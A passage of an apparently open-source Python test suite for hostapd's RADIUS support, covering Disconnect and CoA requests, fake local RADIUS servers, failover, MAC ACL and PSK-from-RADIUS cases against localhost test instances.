logger.info("Disconnect-Request with mismatching Acct-Multi-Session-Id")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
Acct_Multi_Session_Id="12345678+87654321",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Multi-Session-Id (len)")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
Acct_Multi_Session_Id="12345678",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with no session identification attributes")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
logger.info("Disconnect-Request with mismatching NAS-IP-Address")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="192.168.3.4",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 403)
logger.info("Disconnect-Request with mismatching NAS-Identifier")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_Identifier="unknown.example.com",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 403)
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
logger.info("Disconnect-Request with matching Acct-Session-Id")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching Acct-Multi-Session-Id")
sta = hapd.get_sta(addr)
multi_sess_id = sta['authMultiSessionId']
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Acct_Multi_Session_Id=multi_sess_id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching User-Name")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_Identifier="nas.example.com",
User_Name="psk.user@example.com",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching Calling-Station-Id")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="127.0.0.1",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED", "CTRL-EVENT-CONNECTED"])
if ev is None:
raise Exception("Timeout while waiting for re-connection")
if "CTRL-EVENT-EAP-STARTED" not in ev:
raise Exception("Unexpected skipping of EAP authentication in reconnection")
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching Calling-Station-Id and non-matching CUI")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
Calling_Station_Id=addr,
Chargeable_User_Identity="foo@example.com",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, error_cause=503)
logger.info("Disconnect-Request with matching CUI")
dev[1].connect("radius-das", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-cui",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
Chargeable_User_Identity="gpsk-chargeable-user-identity",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[1].wait_disconnected(timeout=10)
dev[1].wait_connected(timeout=10, error="Re-connection timed out")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
connect(dev[2], "radius-das")
logger.info("Disconnect-Request with matching User-Name - multiple sessions matching")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_Identifier="nas.example.com",
User_Name="psk.user@example.com",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, error_cause=508)
logger.info("Disconnect-Request with User-Name matching multiple sessions, Calling-Station-Id only one")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
User_Name="psk.user@example.com",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
ev = dev[2].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
logger.info("Disconnect-Request with matching Acct-Multi-Session-Id after disassociation")
sta = hapd.get_sta(addr)
multi_sess_id = sta['authMultiSessionId']
dev[0].request("DISCONNECT")
dev[0].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Acct_Multi_Session_Id=multi_sess_id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].request("RECONNECT")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].wait_connected(timeout=15)
logger.info("Disconnect-Request with matching User-Name after disassociation")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected(timeout=10)
dev[2].request("DISCONNECT")
dev[2].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
User_Name="psk.user@example.com",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
logger.info("Disconnect-Request with matching CUI after disassociation")
dev[1].request("DISCONNECT")
dev[1].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Chargeable_User_Identity="gpsk-chargeable-user-identity",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
logger.info("Disconnect-Request with matching Calling-Station-Id after disassociation")
dev[0].request("RECONNECT")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].wait_connected(timeout=15)
dev[0].request("DISCONNECT")
dev[0].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
logger.info("Disconnect-Request with mismatching Calling-Station-Id after disassociation")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, error_cause=503)
def add_message_auth_req(req):
req.authenticator = req.CreateAuthenticator()
hmac_obj = hmac.new(req.secret)
hmac_obj.update(struct.pack("B", req.code))
hmac_obj.update(struct.pack("B", req.id))
# request attributes
req.AddAttribute("Message-Authenticator", 16*"\x00")
attrs = req._PktEncodeAttributes()
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(16*"\x00") # all zeros Authenticator in calculation
hmac_obj.update(attrs)
del req[80]
req.AddAttribute("Message-Authenticator", hmac_obj.digest())
def test_radius_das_disconnect_time_window(dev, apdev):
"""RADIUS Dynamic Authorization Extensions - Disconnect - time window"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
import radius_das
except ImportError:
raise HwsimSkip("No pyrad modules available")
params = hostapd.wpa2_eap_params(ssid="radius-das")
params['radius_das_port'] = "3799"
params['radius_das_client'] = "127.0.0.1 secret"
params['radius_das_require_event_timestamp'] = "1"
params['radius_das_require_message_authenticator'] = "1"
params['radius_das_time_window'] = "10"
params['own_ip_addr'] = "127.0.0.1"
params['nas_identifier'] = "nas.example.com"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-das")
addr = dev[0].own_addr()
sta = hapd.get_sta(addr)
id = sta['dot1xAuthSessionId']
dict = pyrad.dictionary.Dictionary("dictionary.radius")
srv = pyrad.client.Client(server="127.0.0.1", acctport=3799,
secret="secret", dict=dict)
srv.retries = 1
srv.timeout = 1
logger.info("Disconnect-Request with unsupported attribute")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()) - 50)
add_message_auth_req(req)
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request with non-matching Event-Timestamp properly ignored")
logger.info("Disconnect-Request with unsupported attribute")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
add_message_auth_req(req)
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
def test_radius_das_coa(dev, apdev):
"""RADIUS Dynamic Authorization Extensions - CoA"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
import radius_das
except ImportError:
raise HwsimSkip("No pyrad modules available")
params = hostapd.wpa2_eap_params(ssid="radius-das")
params['radius_das_port'] = "3799"
params['radius_das_client'] = "127.0.0.1 secret"
params['radius_das_require_event_timestamp'] = "1"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-das")
addr = dev[0].p2p_interface_addr()
sta = hapd.get_sta(addr)
id = sta['dot1xAuthSessionId']
dict = pyrad.dictionary.Dictionary("dictionary.radius")
srv = pyrad.client.Client(server="127.0.0.1", acctport=3799,
secret="secret", dict=dict)
srv.retries = 1
srv.timeout = 1
# hostapd does not currently support CoA-Request, so NAK is expected
logger.info("CoA-Request with matching Acct-Session-Id")
req = radius_das.CoAPacket(dict=dict, secret="secret",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.CoANAK, error_cause=405)
def test_radius_ipv6(dev, apdev):
"""RADIUS connection over IPv6"""
params = {}
params['ssid'] = 'as'
params['beacon_int'] = '2000'
params['radius_server_clients'] = 'auth_serv/radius_clients_ipv6.conf'
params['radius_server_ipv6'] = '1'
params['radius_server_auth_port'] = '18129'
params['radius_server_acct_port'] = '18139'
params['eap_server'] = '1'
params['eap_user_file'] = 'auth_serv/eap_user.conf'
params['ca_cert'] = 'auth_serv/ca.pem'
params['server_cert'] = 'auth_serv/server.pem'
params['private_key'] = 'auth_serv/server.key'
hostapd.add_ap(apdev[1], params)
params = hostapd.wpa2_eap_params(ssid="radius-ipv6")
params['auth_server_addr'] = "::0"
params['auth_server_port'] = "18129"
params['acct_server_addr'] = "::0"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
params['own_ip_addr'] = "::0"
hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-ipv6")
def test_radius_macacl(dev, apdev):
"""RADIUS MAC ACL"""
params = hostapd.radius_params()
params["ssid"] = "radius"
params["macaddr_acl"] = "2"
hostapd.add_ap(apdev[0], params)
dev[0].connect("radius", key_mgmt="NONE", scan_freq="2412")
# Invalid VLAN ID from RADIUS server
dev[2].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[2].request("REMOVE_NETWORK all")
dev[2].wait_disconnected()
dev[2].connect("radius", key_mgmt="NONE", scan_freq="2412")
def test_radius_macacl_acct(dev, apdev):
"""RADIUS MAC ACL and accounting enabled"""
params = hostapd.radius_params()
params["ssid"] = "radius"
params["macaddr_acl"] = "2"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hostapd.add_ap(apdev[0], params)
dev[0].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[1].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[1].request("DISCONNECT")
dev[1].wait_disconnected()
dev[1].request("RECONNECT")
def test_radius_failover(dev, apdev):
"""RADIUS Authentication and Accounting server failover"""
subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-failover")
params["auth_server_addr"] = "192.168.213.17"
params["auth_server_port"] = "1812"
params["auth_server_shared_secret"] = "testing"
params['acct_server_addr'] = "192.168.213.17"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "testing"
params['radius_retry_primary_interval'] = "20"
hapd = hostapd.add_ap(apdev[0], params, no_enable=True)
hapd.set("auth_server_addr", "127.0.0.1")
hapd.set("auth_server_port", "1812")
hapd.set("auth_server_shared_secret", "radius")
hapd.set('acct_server_addr', "127.0.0.1")
hapd.set('acct_server_port', "1813")
hapd.set('acct_server_shared_secret', "radius")
hapd.enable()
ev = hapd.wait_event(["AP-ENABLED", "AP-DISABLED"], timeout=30)
if ev is None:
raise Exception("AP startup timed out")
if "AP-ENABLED" not in ev:
raise Exception("AP startup failed")
start = os.times()[4]
try:
subprocess.call(['ip', 'ro', 'replace', 'prohibit', '192.168.213.17'])
dev[0].request("SET EAPOL::authPeriod 5")
connect(dev[0], "radius-failover", wait_connect=False)
dev[0].wait_connected(timeout=20)
finally:
dev[0].request("SET EAPOL::authPeriod 30")
subprocess.call(['ip', 'ro', 'del', '192.168.213.17'])
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e <= req_s:
raise Exception("Unexpected RADIUS server acct MIB value")
end = os.times()[4]
try:
subprocess.call(['ip', 'ro', 'replace', 'prohibit', '192.168.213.17'])
dev[1].request("SET EAPOL::authPeriod 5")
if end - start < 21:
time.sleep(21 - (end - start))
connect(dev[1], "radius-failover", wait_connect=False)
dev[1].wait_connected(timeout=20)
finally:
dev[1].request("SET EAPOL::authPeriod 30")
subprocess.call(['ip', 'ro', 'del', '192.168.213.17'])
def run_pyrad_server(srv, t_events):
srv.RunWithStop(t_events)
def test_radius_protocol(dev, apdev):
"""RADIUS Authentication protocol tests with a fake server"""
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
logger.info("Received authentication request")
reply = self.CreateReplyPacket(pkt)
reply.code = pyrad.packet.AccessAccept
if self.t_events['msg_auth'].is_set():
logger.info("Add Message-Authenticator")
if self.t_events['wrong_secret'].is_set():
logger.info("Use incorrect RADIUS shared secret")
pw = "incorrect"
else:
pw = reply.secret
hmac_obj = hmac.new(pw)
hmac_obj.update(struct.pack("B", reply.code))
hmac_obj.update(struct.pack("B", reply.id))
# reply attributes
reply.AddAttribute("Message-Authenticator",
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
attrs = reply._PktEncodeAttributes()
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(pkt.authenticator)
hmac_obj.update(attrs)
if self.t_events['double_msg_auth'].is_set():
logger.info("Include two Message-Authenticator attributes")
else:
del reply[80]
reply.AddAttribute("Message-Authenticator", hmac_obj.digest())
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_events):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_events = t_events
while not t_events['stop'].is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
"radius",
"localhost")
srv.BindToAddress("")
t_events = {}
t_events['stop'] = threading.Event()
t_events['msg_auth'] = threading.Event()
t_events['wrong_secret'] = threading.Event()
t_events['double_msg_auth'] = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_events))
t.start()
try:
params = hostapd.wpa2_eap_params(ssid="radius-test")
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-test", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
time.sleep(0.1)
dev[0].dump_monitor()
t_events['msg_auth'].set()
t_events['wrong_secret'].set()
connect(dev[0], "radius-test", wait_connect=False)
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
time.sleep(0.1)
dev[0].dump_monitor()
t_events['wrong_secret'].clear()
connect(dev[0], "radius-test", wait_connect=False)
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
time.sleep(0.1)
dev[0].dump_monitor()
t_events['double_msg_auth'].set()
connect(dev[0], "radius-test", wait_connect=False)
time.sleep(1)
finally:
t_events['stop'].set()
t.join()
def test_radius_psk(dev, apdev):
"""WPA2 with PSK from RADIUS"""
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
logger.info("Received authentication request")
reply = self.CreateReplyPacket(pkt)
reply.code = pyrad.packet.AccessAccept
a = "\xab\xcd"
secret = reply.secret
if self.t_events['long'].is_set():
p = b'\x10' + "0123456789abcdef" + 15 * b'\x00'
b = hashlib.md5(secret + pkt.authenticator + a).digest()
pp = bytearray(p[0:16])
bb = bytearray(b)
cc = bytearray(pp[i] ^ bb[i] for i in range(len(bb)))
b = hashlib.md5(reply.secret + bytes(cc)).digest()
pp = bytearray(p[16:32])
bb = bytearray(b)
cc += bytearray(pp[i] ^ bb[i] for i in range(len(bb)))
data = '\x00' + a + bytes(cc)
else:
p = b'\x08' + "12345678" + 7 * b'\x00'
b = hashlib.md5(secret + pkt.authenticator + a).digest()
pp = bytearray(p)
bb = bytearray(b)
cc = bytearray(pp[i] ^ bb[i] for i in range(len(bb)))
data = '\x00' + a + bytes(cc)
reply.AddAttribute("Tunnel-Password", data)
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_events):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_events = t_events
while not t_events['stop'].is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
"radius",
"localhost")
srv.BindToAddress("")
t_events = {}
t_events['stop'] = threading.Event()
t_events['long'] = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_events))
t.start()
try:
ssid = "test-wpa2-psk"
params = hostapd.radius_params()
params['ssid'] = ssid
params["wpa"] = "2"
params["wpa_key_mgmt"] = "WPA-PSK"
params["rsn_pairwise"] = "CCMP"
params['macaddr_acl'] = '2'
params['wpa_psk_radius'] = '2'
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect(ssid, psk="12345678", scan_freq="2412")
t_events['long'].set()
dev[1].connect(ssid, psk="0123456789abcdef", scan_freq="2412")
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_invalid(dev, apdev):
"""WPA2 with invalid PSK from RADIUS"""
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
logger.info("Received authentication request")
reply = self.CreateReplyPacket(pkt)
reply.code = pyrad.packet.AccessAccept
a = "\xab\xcd"
secret = reply.secret
p = b'\x07' + "1234567" + 8 * b'\x00'
b = hashlib.md5(secret + pkt.authenticator + a).digest()
pp = bytearray(p)
bb = bytearray(b)
cc = bytearray(pp[i] ^ bb[i] for i in range(len(bb)))
data = '\x00' + a + bytes(cc)
reply.AddAttribute("Tunnel-Password", data)
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_events):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_events = t_events
while not t_events['stop'].is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
"radius",
"localhost")
srv.BindToAddress("")
t_events = {}
t_events['stop'] = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_events))
t.start()
try:
ssid = "test-wpa2-psk"
params = hostapd.radius_params()
params['ssid'] = ssid
params["wpa"] = "2"
params["wpa_key_mgmt"] = "WPA-PSK"
params["rsn_pairwise"] = "CCMP"
params['macaddr_acl'] = '2'
params['wpa_psk_radius'] = '2'
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect(ssid, psk="12345678", scan_freq="2412",
wait_connect=False)
time.sleep(1)
finally:
t_events['stop'].set()
t.join()
def test_radius_auth_force_client_addr(dev, apdev):
"""RADIUS client address specified"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['radius_client_addr'] = "127.0.0.1"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth")
@remote_compatible
def test_radius_auth_force_invalid_client_addr(dev, apdev):
"""RADIUS client address specified and invalid address"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
#params['radius_client_addr'] = "10.11.12.14"
params['radius_client_addr'] = "1::2"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected connection")
def add_message_auth(req):
req.authenticator = req.CreateAuthenticator()
hmac_obj = hmac.new(req.secret)
hmac_obj.update(struct.pack("B", req.code))
hmac_obj.update(struct.pack("B", req.id))
# request attributes
req.AddAttribute("Message-Authenticator",
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
attrs = req._PktEncodeAttributes()
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(req.authenticator)
hmac_obj.update(attrs)
del req[80]
req.AddAttribute("Message-Authenticator", hmac_obj.digest())
def test_radius_server_failures(dev, apdev):
"""RADIUS server failure cases"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
dict = pyrad.dictionary.Dictionary("dictionary.radius")
client = pyrad.client.Client(server="127.0.0.1", authport=1812,
secret="radius", dict=dict)
client.retries = 1
client.timeout = 1
# unexpected State
req = client.CreateAuthPacket(code=pyrad.packet.AccessRequest,
User_Name="foo")
req['State'] = 'foo-state'
add_message_auth(req)
reply = client.SendPacket(req)
if reply.code != pyrad.packet.AccessReject:
raise Exception("Unexpected RADIUS response code " + str(reply.code))
# no EAP-Message
req = client.CreateAuthPacket(code=pyrad.packet.AccessRequest,
User_Name="foo")
add_message_auth(req)
try:
reply = client.SendPacket(req)
raise Exception("Unexpected response")
except pyrad.client.Timeout:
pass
def test_ap_vlan_wpa2_psk_radius_required(dev, apdev):
"""AP VLAN with WPA2-PSK and RADIUS attributes required"""
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
logger.info("Received authentication request")
reply = self.CreateReplyPacket(pkt)
reply.code = pyrad.packet.AccessAccept
secret = reply.secret
if self.t_events['extra'].is_set():
reply.AddAttribute("Chargeable-User-Identity", "test-cui")
reply.AddAttribute("User-Name", "test-user")
if self.t_events['long'].is_set():
reply.AddAttribute("Tunnel-Type", 13)
reply.AddAttribute("Tunnel-Medium-Type", 6)
reply.AddAttribute("Tunnel-Private-Group-ID", "1")
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_events):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_events = t_events
while not t_events['stop'].is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
"radius",
"localhost")
srv.BindToAddress("")
t_events = {}
t_events['stop'] = threading.Event()
t_events['long'] = threading.Event()
t_events['extra'] = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_events))
t.start()
try:
ssid = "test-wpa2-psk"
params = hostapd.radius_params()
params['ssid'] = ssid
params["wpa"] = "2"
params["wpa_key_mgmt"] = "WPA-PSK"
params["rsn_pairwise"] = "CCMP"
params['macaddr_acl'] = '2'
params['dynamic_vlan'] = "2"
params['wpa_passphrase'] = '0123456789abcdefghi'
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(apdev[0], params)
logger.info("connecting without VLAN")
dev[0].connect(ssid, psk="0123456789abcdefghi", scan_freq="2412",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-SSID-TEMP-DISABLED"], timeout=20)
if ev is None:
raise Exception("Timeout on connection attempt")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected success without vlan parameters")
logger.info("connecting without VLAN failed as expected")
logger.info("connecting without VLAN (CUI/User-Name)")
t_events['extra'].set()
dev[1].connect(ssid, psk="0123456789abcdefghi", scan_freq="2412",
wait_connect=False)
ev = dev[1].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-SSID-TEMP-DISABLED"], timeout=20)
if ev is None:
raise Exception("Timeout on connection attempt")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected success without vlan parameters(2)")
logger.info("connecting without VLAN failed as expected(2)")
t_events['extra'].clear()
t_events['long'].set()
logger.info("connecting with VLAN")
dev[2].connect(ssid, psk="0123456789abcdefghi", scan_freq="2412",
wait_connect=False)
ev = dev[2].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-SSID-TEMP-DISABLED"], timeout=20)
if ev is None:
raise Exception("Timeout on connection attempt")
if "CTRL-EVENT-SSID-TEMP-DISABLED" in ev:
raise Exception("Unexpected failure with vlan parameters")
logger.info("connecting with VLAN succeeded as expected")
finally:
t_events['stop'].set()
t.join()
def test_radius_mppe_failure(dev, apdev):
"""RADIUS failure when adding MPPE keys"""
params = { "ssid": "as", "beacon_int": "2000",
"radius_server_clients": "auth_serv/radius_clients.conf",
"radius_server_auth_port": '18127',
"eap_server": "1",
"eap_user_file": "auth_serv/eap_user.conf",
"ca_cert": "auth_serv/ca.pem",
"server_cert": "auth_serv/server.pem",
"private_key": "auth_serv/server.key" }
authsrv = hostapd.add_ap(apdev[1], params)
params = hostapd.wpa2_eap_params(ssid="test-wpa2-eap")
params['auth_server_port'] = "18127"
hapd = hostapd.add_ap(apdev[0], params)
with fail_test(authsrv, 1, "os_get_random;radius_msg_add_mppe_keys"):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", eap="TTLS",
identity="user", anonymous_identity="ttls",
password="password",
